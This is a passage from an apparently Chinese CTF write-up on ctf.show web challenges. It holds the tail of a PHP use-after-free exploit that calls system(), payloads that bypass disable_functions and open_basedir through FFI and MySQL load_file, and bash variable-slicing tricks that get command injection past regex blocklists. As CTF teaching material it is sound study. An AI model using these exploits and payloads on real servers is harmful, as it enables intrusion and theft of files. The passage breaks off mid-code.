&#x27;bin2hex&#x27; constant check</span><br><span class="line">                if($deref != 0x786568326e6962)</span><br><span class="line">                    continue;</span><br><span class="line">            &#125; else continue;</span><br><span class="line"> </span><br><span class="line">            return $data_addr + $i * 8;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function get_binary_base($binary_leak) &#123;</span><br><span class="line">        $base = 0;</span><br><span class="line">        $start = $binary_leak &amp; 0xfffffffffffff000;</span><br><span class="line">        for($i = 0; $i &lt; 0x1000; $i++) &#123;</span><br><span class="line">            $addr = $start - 0x1000 * $i;</span><br><span class="line">            $leak = leak($addr, 0, 7);</span><br><span class="line">            if($leak == 0x10102464c457f) &#123; # ELF header</span><br><span class="line">                return $addr;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function get_system($basic_funcs) &#123;</span><br><span class="line">        $addr = $basic_funcs;</span><br><span class="line">        do &#123;</span><br><span class="line">            $f_entry = leak($addr);</span><br><span class="line">            $f_name = leak($f_entry, 0, 6);</span><br><span class="line"> </span><br><span class="line">            if($f_name == 0x6d6574737973) &#123; # system</span><br><span class="line">                return leak($addr + 8);</span><br><span class="line">            &#125;</span><br><span class="line">            $addr += 0x20;</span><br><span class="line">        &#125; while($f_entry != 0);</span><br><span class="line">        return false;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    function trigger_uaf($arg) &#123;</span><br><span class="line">        # str_shuffle prevents opcache string interning</span><br><span class="line">        $arg = str_shuffle(&#x27;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#x27;);</span><br><span class="line">        $vuln = new Vuln();</span><br><span class="line">        $vuln-&gt;a = $arg;</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    if(stristr(PHP_OS, &#x27;WIN&#x27;)) &#123;</span><br><span class="line">        die(&#x27;This PoC is for *nix systems only.&#x27;);</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    $n_alloc = 10; # increase this value if UAF fails</span><br><span class="line">    $contiguous = [];</span><br><span class="line">    for($i = 0; $i &lt; $n_alloc; $i++)</span><br><span class="line">        $contiguous[] = str_shuffle(&#x27;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#x27;);</span><br><span class="line"> </span><br><span class="line">    trigger_uaf(&#x27;x&#x27;);</span><br><span class="line">    $abc = $backtrace[1][&#x27;args&#x27;][0];</span><br><span class="line"> </span><br><span class="line">    $helper = new Helper;</span><br><span class="line">    $helper-&gt;b = function ($x) &#123; &#125;;</span><br><span class="line"> </span><br><span class="line">    if(strlen($abc) == 79 || strlen($abc) == 0) &#123;</span><br><span class="line">        die(&quot;UAF failed&quot;);</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    # leaks</span><br><span class="line">    $closure_handlers = str2ptr($abc, 0);</span><br><span class="line">    $php_heap = str2ptr($abc, 0x58);</span><br><span class="line">    $abc_addr = $php_heap - 0xc8;</span><br><span class="line"> </span><br><span class="line">    # fake value</span><br><span class="line">    write($abc, 0x60, 2);</span><br><span class="line">    write($abc, 0x70, 6);</span><br><span class="line"> </span><br><span class="line">    # fake reference</span><br><span class="line">    write($abc, 0x10, $abc_addr + 0x60);</span><br><span class="line">    write($abc, 0x18, 0xa);</span><br><span class="line"> </span><br><span class="line">    $closure_obj = str2ptr($abc, 0x20);</span><br><span class="line"> </span><br><span class="line">    $binary_leak = leak($closure_handlers, 8);</span><br><span class="line">    if(!($base = get_binary_base($binary_leak))) &#123;</span><br><span class="line">        die(&quot;Couldn&#x27;t determine binary base address&quot;);</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    if(!($elf = parse_elf($base))) &#123;</span><br><span class="line">        die(&quot;Couldn&#x27;t parse ELF header&quot;);</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    if(!($basic_funcs = get_basic_funcs($base, $elf))) &#123;</span><br><span class="line">        die(&quot;Couldn&#x27;t get basic_functions address&quot;);</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    if(!($zif_system = get_system($basic_funcs))) &#123;</span><br><span class="line">        die(&quot;Couldn&#x27;t get zif_system address&quot;);</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    # fake closure object</span><br><span class="line">    $fake_obj_offset = 0xd0;</span><br><span class="line">    for($i = 0; $i &lt; 0x110; $i += 8) &#123;</span><br><span class="line">        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));</span><br><span class="line">    &#125;</span><br><span class="line"> </span><br><span class="line">    # pwn</span><br><span class="line">    write($abc, 0x20, $abc_addr + $fake_obj_offset);</span><br><span class="line">    write($abc, 0xd0 + 0x38, 1, 4); # internal func type</span><br><span class="line">    write($abc, 0xd0 + 0x68, $zif_system); # internal func handler</span><br><span class="line"> </span><br><span class="line">    ($helper-&gt;b)($cmd);</span><br><span class="line">    exit();</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>需要在burp中编码后发送</p>
<p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-08-02175556.png"></p>
<h1 id="web-73-74"><a href="#web-73-74" class="headerlink" title="web 73-74"></a>web 73-74</h1><h2 id="一-分析代码-15"><a href="#一-分析代码-15" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p>glob协议遍历出文件</p>
<h2 id="二-解题思路：-35"><a href="#二-解题思路：-35" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><h3 id="方法一：-11"><a href="#方法一：-11" class="headerlink" title="方法一："></a>方法一：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">c=var_export(scandir(&#x27;/&#x27;));exit(); //发现根目录下有flagc.txt</span><br><span class="line">c=include(&#x27;/flagc.txt&#x27;);exit();</span><br></pre></td></tr></table></figure>

<p>注：74为flagx.txt</p>
<h3 id="方法二：-11"><a href="#方法二：-11" class="headerlink" title="方法二："></a>方法二：</h3><p>可以利用数组遍历的方法输出根目录下的所有文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">c=?&gt;&lt;?php    //前面的?&gt;用来闭合&lt;?</span><br><span class="line">	$a=new DirectoryIterator(&quot;glob:///*&quot;);   //php使用glob遍历文件夹</span><br><span class="line">	foreach($a as $f) </span><br><span class="line">	&#123;</span><br><span class="line">		echo($f-&gt;__toString().&#x27; &#x27;);</span><br><span class="line">	&#125; </span><br><span class="line">	exit(0);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>



<h1 id="web-75-76"><a href="#web-75-76" class="headerlink" title="web 75-76"></a>web 75-76</h1><h2 id="一-分析代码-16"><a href="#一-分析代码-16" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p>这次过滤的更多了，连include也被过滤了</p>
<h2 id="二-解题思路：-36"><a href="#二-解题思路：-36" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">c=?&gt;&lt;?php $a=new DirectoryIterator(&quot;glob:///*&quot;);foreach($a as $f)&#123;echo($f-</span><br><span class="line">&gt;__toString().&#x27;&#x27;);&#125;exit(0);?&gt;</span><br></pre></td></tr></table></figure>

<p>读到根目录下的flag36.txt。</p>
<p>#通过payload扫描 flag36.txt</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">c=</span><br><span class="line"> </span><br><span class="line">try &#123;</span><br><span class="line">    $dbh = new PDO(&#x27;mysql:host=localhost;dbname=ctftraining&#x27;, &#x27;root&#x27;,</span><br><span class="line">        &#x27;root&#x27;);</span><br><span class="line"> </span><br><span class="line">    foreach ($dbh-&gt;query(&#x27;select load_file(&quot;/flag36.txt&quot;)&#x27;) as $row) &#123;</span><br><span class="line">        echo ($row[0]) . &quot;|&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">    $dbh = null;</span><br><span class="line">&#125; catch (PDOException $e) &#123;</span><br><span class="line">    echo $e-&gt;getMessage();</span><br><span class="line">    exit(0);</span><br><span class="line">&#125;</span><br><span class="line">exit(0);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>数据库的连接是读配置文件得到的<br> SQL语句来读文件绕过open_basedir和disable_function</p>
<h1 id="web-77"><a href="#web-77" class="headerlink" title="web 77"></a>web 77</h1><h2 id="一-分析代码-17"><a href="#一-分析代码-17" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p>这题在题干中说到php7.4，可以想到<a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/ffi.cdef.php">FFI</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">FFI（Foreign Function Interface），即外部函数接口，是指在一种语言里调用另一种语言代码的技术。PHP的FFI扩展就是一个让你在PHP里调用C代码的技术。</span><br></pre></td></tr></table></figure>

<p>通过FFI，可以实现调用system函数，从而将flag直接写入一个新建的文本文件中，然后访问这个文本文件，获得flag</p>
<h2 id="二-解题思路：-37"><a href="#二-解题思路：-37" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p> payload:</p>
<p><strong>第一种：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">//首先是熟悉的确定flag位置和名称</span><br><span class="line">c=?&gt;&lt;?php </span><br><span class="line">	$a=new DirectoryIterator(&quot;glob:///*&quot;); </span><br><span class="line">	foreach($a as $f) </span><br><span class="line">	&#123; </span><br><span class="line">		echo($f-&gt;__toString().&#x27;  &#x27;);</span><br><span class="line">	&#125; </span><br><span class="line">	exit();</span><br><span class="line">?&gt;</span><br><span class="line">//FFI调用system函数</span><br><span class="line">c=</span><br><span class="line">$ffi=FFI :: cdef(&quot;int system(const char *command);&quot;);</span><br><span class="line">$a=&#x27;/readflag &gt; 1.txt&#x27;;</span><br><span class="line">$ffi-&gt;system($a);</span><br><span class="line">exit();</span><br></pre></td></tr></table></figure>

<p><strong>第二种：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">c=</span><br><span class="line">$a=new DirectoryIterator(&quot;glob:///*&quot;);</span><br><span class="line">foreach($a as $f)&#123;</span><br><span class="line">echo $f.&quot;    &quot; ;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$ffi = FFI::cdef(</span><br><span class="line">    &quot;int system(const char *command);&quot;);</span><br><span class="line"></span><br><span class="line">$ffi-&gt;system(&quot;/readflag &gt; 1.txt&quot;);</span><br><span class="line"></span><br><span class="line">exit();</span><br></pre></td></tr></table></figure>

<p>第二种之后要访问1.txt</p>
<h1 id="web-118"><a href="#web-118" class="headerlink" title="web 118"></a>web 118</h1><h2 id="一-分析代码-18"><a href="#一-分析代码-18" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p><strong>事先了解一下：</strong><br> <a target="_blank" rel="noopener" href="https://blog.51cto.com/allenh/1695810">Linux 基础知识：Bash的内置变量</a><br> <a target="_blank" rel="noopener" href="https://www.cnblogs.com/sparkdev/p/9934595.html#title_0">常见 Bash 内置变量介绍</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">root@baba:~# echo $&#123;PWD&#125;</span><br><span class="line">/root</span><br><span class="line">root@baba:~# echo $&#123;PWD:1:1&#125;   //表示从第2（1+1）个字符开始的一个字符</span><br><span class="line">r</span><br><span class="line">root@baba:~# echo $&#123;PWD:0:1&#125;   //表示从第1（0+1）个字符开始的一个字符</span><br><span class="line">/</span><br><span class="line">root@baba:~# echo $&#123;PWD:~0:1&#125;  //表示从最后一个字符开始的一个字符</span><br><span class="line">t</span><br><span class="line">root@baba:~# echo $&#123;PWD:~A&#125;    //字母代表0</span><br><span class="line">t</span><br></pre></td></tr></table></figure>



<h2 id="二-解题思路：-38"><a href="#二-解题思路：-38" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p><code>所以可以利用各个环境变量的最后一位来构造命令。 $&#123;PWD&#125;在这题肯定是/var/www/html，而$&#123;PATH&#125;通常是bin,那么$&#123;PWD:~A&#125;的结果就应该是’ l ‘，因为$&#123;PATH:~A&#125;的结果是’ n &#39;，那么他们拼接在一起正好是nl，能够读取flag，因为通配符没有被过滤，所以可以用通配符代替flag.php</code></p>
<p>临时写的fuzz脚本，上脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://187ad318-8353-4d22-8adf-e39767820f98.challenge.ctf.show/&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">list</span> = string.ascii_letters+string.digits+<span class="string">&quot;$+-&#125;&#123;_&gt;&lt;:?*.~/\\ &quot;</span></span><br><span class="line"></span><br><span class="line">white_list = <span class="string">&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> payload <span class="keyword">in</span> <span class="built_in">list</span>:</span><br><span class="line"></span><br><span class="line">    data = &#123;</span><br><span class="line">        <span class="string">&quot;code&quot;</span> : payload</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    res = requests.post(url, data=data)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;evil input&quot;</span> <span class="keyword">not</span> <span class="keyword">in</span> res.text:</span><br><span class="line">        <span class="built_in">print</span>(payload)</span><br><span class="line">        white_list += payload</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(white_list.replace(<span class="string">&quot; &quot;</span>,<span class="string">&quot;空格&quot;</span>))</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>扫一下，白名单为 <code>ABCDEFGHIJKLMNOPQRSTUVWXYZ$&#125;&#123;_:?.~空格</code></p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$&#123;PATH:~A&#125;$&#123;PWD:~A&#125; ????.???</span><br></pre></td></tr></table></figure>

<p>具体解释：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/knight-errant-dr/p/16377935.html">https://www.cnblogs.com/knight-errant-dr/p/16377935.html</a></p>
<h1 id="web-119-120"><a href="#web-119-120" class="headerlink" title="web 119-120"></a>web 119-120</h1><h2 id="一-分析代码-19"><a href="#一-分析代码-19" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p>比上题多过滤了path</p>
<h2 id="二-解题思路：-39"><a href="#二-解题思路：-39" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><h3 id="方法一：-12"><a href="#方法一：-12" class="headerlink" title="方法一："></a>方法一：</h3><p>可以构造出<code>/bin/base64 flag.php</code>，只需要/和4两个字符就行，其他的可以用通配符代替。<br> /很简单，pwd的第一位就是，因为这题ban了数字，所以可以用该题值必是1的<code>$&#123;#SHLVL&#125;`绕过

**SHLVL**
 `是记录多个 Bash 进程实例嵌套深度的累加器,进程第一次打开shell时$&#123;SHLVL&#125;=1，然后在此shell中再打开一个shell时$SHLVL=2。`

只需要`$&#123;PWD::$&#123;SHLVL&#125;&#125;</code>，结果就是/</p>
<p><strong>RANDOM</strong><br> <code>此变量值，随机出现整数，范围为0-32767。不过，虽然说是随机，但并不是真正的随机，因为每次得到的随机数都一样。为此，在使用RANDOM变量前，请随意设定一个数字给RANDOM，当做随机数种子，这样才不会每次产生的随机数其顺序都一样。</code></p>
<p>4的问题，可以用<code>$&#123;#RANDOM&#125;`，在Linux中，`$&#123;#xxx&#125;`显示的是这个值的位数`不加#是变量的值，加了#是变量的值的长度`，例如12345的值是5，而random函数绝大部分产生的数字都是4位或者5位的，因此可以代替4.
 payload：

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=$&#123;PWD::$&#123;#SHLVL&#125;&#125;???$&#123;PWD::$&#123;#SHLVL&#125;&#125;?????$&#123;#RANDOM&#125; ????.???</span><br></pre></td></tr></table></figure>

### 方式二：

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">可以构造/bin/cat flag.php,需要t和/，$&#123;HOME&#125;默认是/root，所以需要得到他的最后一个字母,容器的hostname应该是5个字母，所以$&#123;#HOSTNAME&#125;可以从第5位开始，1还是用$&#123;#SHLVL&#125;代替</span><br></pre></td></tr></table></figure>

payload：

`code=$&#123;PWD::$&#123;#SHLVL&#125;&#125;???$&#123;PWD::$&#123;#SHLVL&#125;&#125;??$&#123;HOME:$&#123;#HOSTNAME&#125;:$&#123;#SHLVL&#125;&#125; ????.???</code></p>
<p>查看源码即可得到flag</p>
<h1 id="web-121"><a href="#web-121" class="headerlink" title="web 121"></a>web 121</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;code&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$code</span>=<span class="variable">$_POST</span>[<span class="string">&#x27;code&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/\x09|\x0a|[a-z]|[0-9]|FLAG|PATH|BASH|HOME|HISTIGNORE|HISTFILESIZE|HISTFILE|HISTCMD|USER|TERM|HOSTNAME|HOSTTYPE|MACHTYPE|PPID|SHLVL|FUNCNAME|\/|\(|\)|\[|\]|\\\\|\+|\-|_|~|\!|\=|\^|\*|\x26|\%|\&lt;|\&gt;|\&#x27;|\&quot;|\`|\||\,/&#x27;</span>, <span class="variable">$code</span>))&#123;    </span><br><span class="line">        <span class="keyword">if</span>(strlen(<span class="variable">$code</span>)&gt;<span class="number">65</span>)&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&#x27;&lt;div align=&quot;center&quot;&gt;&#x27;</span>.<span class="string">&#x27;you are so long , I dont like &#x27;</span>.<span class="string">&#x27;&lt;/div&gt;&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;&lt;div align=&quot;center&quot;&gt;&#x27;</span>.system(<span class="variable">$code</span>).<span class="string">&#x27;&lt;/div&gt;&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">     <span class="keyword">echo</span> <span class="string">&#x27;&lt;div align=&quot;center&quot;&gt;evil input&lt;/div&gt;&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码-20"><a href="#一-分析代码-20" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p><code>$#</code><br> <code>$?</code><br> 这两个的值都为0<br> 加上#代表长度就为1<br> 这题最关键的SHLVL被过滤了，可以用<code>$&#123;##&#125;或$&#123;#?&#125;`代替



## 二.解题思路：

` code=$&#123;PWD::$&#123;##&#125;&#125;???$&#123;PWD::$&#123;##&#125;&#125;?????$&#123;#RANDOM&#125; ????.???
  code=$&#123;PWD::$&#123;#?&#125;&#125;???$&#123;PWD::$&#123;#?&#125;&#125;?????$&#123;#RANDOM&#125; ????.???`

hint中的payload

` code=$&#123;PWD::$&#123;#?&#125;&#125;???$&#123;PWD::$&#123;#?&#125;&#125;$&#123;PWD:$&#123;#IFS&#125;:$&#123;#?&#125;&#125;?? ????.???</code></p>
<p>使用的是/bin/rev读文件 把文件中每行逆序输出读取<br>用到了IFS</p>
<pre><code>定义字段分隔字符。默认值为：空格符、tab字符、换行字符(newline) 长度为3
</code></pre>
<p>PWD为 /var/www/html<br>刚好第三个是r<br>可以匹配到/bin/rev</p>
<h1 id="web-122"><a href="#web-122" class="headerlink" title="web 122"></a>web 122</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;code&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$code</span>=<span class="variable">$_POST</span>[<span class="string">&#x27;code&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/\x09|\x0a|[a-z]|[0-9]|FLAG|PATH|BASH|PWD|HISTIGNORE|HISTFILESIZE|HISTFILE|HISTCMD|USER|TERM|HOSTNAME|HOSTTYPE|MACHTYPE|PPID|SHLVL|FUNCNAME|\/|\(|\)|\[|\]|\\\\|\+|\-|_|~|\!|\=|\^|\*|\x26|#|%|\&gt;|\&#x27;|\&quot;|\`|\||\,/&#x27;</span>, <span class="variable">$code</span>))&#123;    </span><br><span class="line">        <span class="keyword">if</span>(strlen(<span class="variable">$code</span>)&gt;<span class="number">65</span>)&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&#x27;&lt;div align=&quot;center&quot;&gt;&#x27;</span>.<span class="string">&#x27;you are so long , I dont like &#x27;</span>.<span class="string">&#x27;&lt;/div&gt;&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;&lt;div align=&quot;center&quot;&gt;&#x27;</span>.system(<span class="variable">$code</span>).<span class="string">&#x27;&lt;/div&gt;&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">     <span class="keyword">echo</span> <span class="string">&#x27;&lt;div align=&quot;center&quot;&gt;evil input&lt;/div&gt;&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="一-解题思路："><a href="#一-解题思路：" class="headerlink" title="一. 解题思路："></a>一. 解题思路：</h2><p>这题在上题的基础上又过滤了#和PWD，PWD的绕过很简单，用HOME就可以，而#,就要用到<code>$?</code>了</p>
<pre><code>$? 执行上一个指令的返回值 (显示最后命令的退出状态。0表示没有错误，其他任何值表明有错误)
</code></pre>
<p>所以在使用<code>$?</code>之前要先给错误的命令 让<code>$?</code>的值为1<br><code>$&#123;&#125;和 &lt;A可以但是题目上$&#123;&#125;这个不可以</code><br>所以用<code>&lt;A</code>后边的数字4还是用RANDOM随机数来获取</p>
<p>payload：</p>
<p><code> code=&lt;A;$&#123;HOME::$?&#125;???$&#123;HOME::$?&#125;?????$&#123;RANDOM::$?&#125; ????.???</code></p>
<h1 id="web-124"><a href="#web-124" class="headerlink" title="web 124"></a>web 124</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="comment">//听说你很喜欢数学，不知道你是否爱它胜过爱flag</span></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="comment">//例子 c=20-1</span></span><br><span class="line">    <span class="variable">$content</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span> (strlen(<span class="variable">$content</span>) &gt;= <span class="number">80</span>) &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;太长了不会算&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$blacklist</span> = [<span class="string">&#x27; &#x27;</span>, <span class="string">&#x27;\t&#x27;</span>, <span class="string">&#x27;\r&#x27;</span>, <span class="string">&#x27;\n&#x27;</span>,<span class="string">&#x27;\&#x27;&#x27;</span>, <span class="string">&#x27;&quot;&#x27;</span>, <span class="string">&#x27;`&#x27;</span>, <span class="string">&#x27;\[&#x27;</span>, <span class="string">&#x27;\]&#x27;</span>];</span><br><span class="line">    <span class="keyword">foreach</span> (<span class="variable">$blacklist</span> <span class="keyword">as</span> <span class="variable">$blackitem</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (preg_match(<span class="string">&#x27;/&#x27;</span> . <span class="variable">$blackitem</span> . <span class="string">&#x27;/m&#x27;</span>, <span class="variable">$content</span>)) &#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;请不要输入奇奇怪怪的字符&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp</span></span><br><span class="line">    <span class="variable">$whitelist</span> = [<span class="string">&#x27;abs&#x27;</span>, <span class="string">&#x27;acos&#x27;</span>, <span class="string">&#x27;acosh&#x27;</span>, <span class="string">&#x27;asin&#x27;</span>, <span class="string">&#x27;asinh&#x27;</span>, <span class="string">&#x27;atan2&#x27;</span>, <span class="string">&#x27;atan&#x27;</span>, <span class="string">&#x27;atanh&#x27;</span>, <span class="string">&#x27;base_convert&#x27;</span>, <span class="string">&#x27;bindec&#x27;</span>, <span 